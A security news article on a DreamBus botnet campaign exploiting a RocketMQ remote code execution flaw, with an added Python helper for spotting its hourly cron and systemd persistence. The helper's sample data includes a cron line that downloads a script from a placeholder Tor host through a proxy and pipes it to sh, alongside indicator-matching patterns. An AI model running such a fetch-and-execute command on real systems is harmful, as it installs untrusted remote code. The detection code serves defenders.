A recently emerged iteration of the DreamBus botnet malware is capitalizing on a critical remote code execution vulnerability present in RocketMQ servers, thereby compromising various devices.
This exploited vulnerability, identified as CVE-2023-33246, is characterized by a permission verification lapse that affects RocketMQ version 5.1.0 and earlier. The flaw permits attackers to execute remote commands under specific circumstances.
Researchers from Juniper Threat Labs have identified a surge in activity related to DreamBus attacks employing the CVE-2023-33246 vulnerability, with notable occurrences observed in mid-June 2023.
The initial DreamBus assaults that harnessed CVE-2023-33246 were detected by Juniper Threat Labs in early June 2023. These attacks were primarily targeted at RocketMQ’s default port, 10911, along with seven additional ports.
To ascertain software versions on publicly exposed servers and identify potential exploitable vulnerabilities, the attackers employed the open-source reconnaissance tool “interactsh.”
Additionally, researchers noted that the threat actor used a Tor proxy service to download a malicious bash script named “reketed.” This script evaded detection by antivirus engines on VirusTotal.
The obfuscated “reketed” script operates as a downloader and installer for the DreamBus main module, an ELF file retrieved from a Tor-based site. To minimize the risk of detection, the file is deleted post-execution.
The main DreamBus module is packed with a custom UPX variant, which allowed it to pass VirusTotal AV scans undetected, and carries encoded scripts that it executes. These scripts serve various purposes, such as signaling online status to the command and control (C2) server, downloading the XMRig Monero miner, executing additional bash scripts, or fetching new malware versions.
To maintain persistence on compromised systems, DreamBus establishes a system service and a cron job, both scheduled to activate hourly. Lateral spreading mechanisms are also present, utilizing tools like ansible, knife, salt, and pssh, in addition to a scanner module targeting external and internal IP ranges to uncover vulnerabilities.
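The hourly persistence described above is something a defender can hunt for directly. The following triage helper is an added example, not code from the article or from Juniper Threat Labs: it flags hourly cron entries and hourly systemd timer/service pairs whose command references the indicators the write-up names (the “reketed” script and Tor-proxied downloads). The cron lines and unit files below are constructed samples, and the `.onion` address is a placeholder.

```python
"""Added triage helper (not the article's or Juniper's code): flag hourly persistence entries
(cron, systemd timer+service) whose command references indicators the write-up names. Samples are constructed."""
import re

# Indicator terms from the write-up ("reketed", Tor fetches); extend with IoCs from your own telemetry.
INDICATOR_RE = re.compile(r"reketed|\.onion\b|socks5h?://|torsocks", re.IGNORECASE)
# A fixed minute list with every other cron field wildcarded, e.g. "17 * * * *", fires hourly.
MINUTE_LIST_RE = re.compile(r"\d{1,2}(,\d{1,2})*")

def cron_entry(line):
    """Return (is_hourly, command) for one crontab line; comments and blanks give (False, '')."""
    fields = line.split(None, 5)
    if not fields or fields[0].startswith("#"):
        return False, ""
    if fields[0] == "@hourly":
        return True, " ".join(fields[1:])
    if len(fields) < 6:
        return False, ""
    minute, hour, dom, mon, dow, cmd = fields
    return bool(MINUTE_LIST_RE.fullmatch(minute)) and hour == dom == mon == dow == "*", cmd

def suspicious_cron(lines):
    """Commands of hourly cron entries that reference an indicator."""
    return [cmd for hourly, cmd in map(cron_entry, lines) if hourly and INDICATOR_RE.search(cmd)]

def parse_unit(text):
    """Collect Key=Value lines of a systemd unit; section headers and comments are skipped."""
    kv = {}
    for s in (raw.strip() for raw in text.splitlines()):
        if "=" in s and not s.startswith(("#", ";", "[")):
            k, v = s.split("=", 1)
            kv.setdefault(k.strip(), []).append(v.strip())
    return kv

HOURLY = {"OnCalendar": {"hourly", "*-*-* *:00:00"}, "OnUnitActiveSec": {"1h", "60min", "3600"}}

def suspicious_unit(timer_text, service_text):
    """True when the timer fires hourly and the service's ExecStart references an indicator."""
    timer = parse_unit(timer_text)
    hourly = any(v in HOURLY[k] for k in HOURLY for v in timer.get(k, []))
    return hourly and any(INDICATOR_RE.search(e) for e in parse_unit(service_text).get("ExecStart", []))

# Constructed samples: a benign daily job, a DreamBus-style hourly Tor fetch, a benign hourly job.
SAMPLE_CRON = [
    "0 3 * * * root /usr/bin/logrotate /etc/logrotate.conf",
    "17 * * * * /bin/sh -c 'curl -x socks5h://127.0.0.1:9050 http://placeholder.onion/reketed | sh'",
    "@hourly /usr/local/bin/backup.sh",
]
SAMPLE_TIMER = "[Timer]\nOnCalendar=hourly\n[Install]\nWantedBy=timers.target\n"
SAMPLE_SERVICE = "[Service]\nType=oneshot\nExecStart=/bin/bash /tmp/reketed\n"
```

Feed it the contents of `/etc/crontab`, `/etc/cron.d/*`, per-user crontabs and the timer/service pairs under `/etc/systemd/system` to get a short list worth a closer look.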
While the primary focus of the ongoing DreamBus campaign seems to be Monero mining, the modular nature of the malware leaves room for potential expansion of its capabilities in future updates.
Given the potential severity of compromising RocketMQ servers in communication environments, the attackers might exploit sensitive conversation data from breached devices for higher monetization prospects, surpassing the gains from crypto mining using hijacked resources.
To mitigate the impact of the latest DreamBus attacks, administrators of RocketMQ are advised to upgrade to version 5.1.1 or later.
Previous versions of the DreamBus malware have targeted various systems, including Redis, PostgreSQL, Hadoop YARN, Apache Spark, HashiCorp Consul, and SaltStack. Hence, maintaining robust patch management practices across all software products is crucial to effectively counter this evolving threat.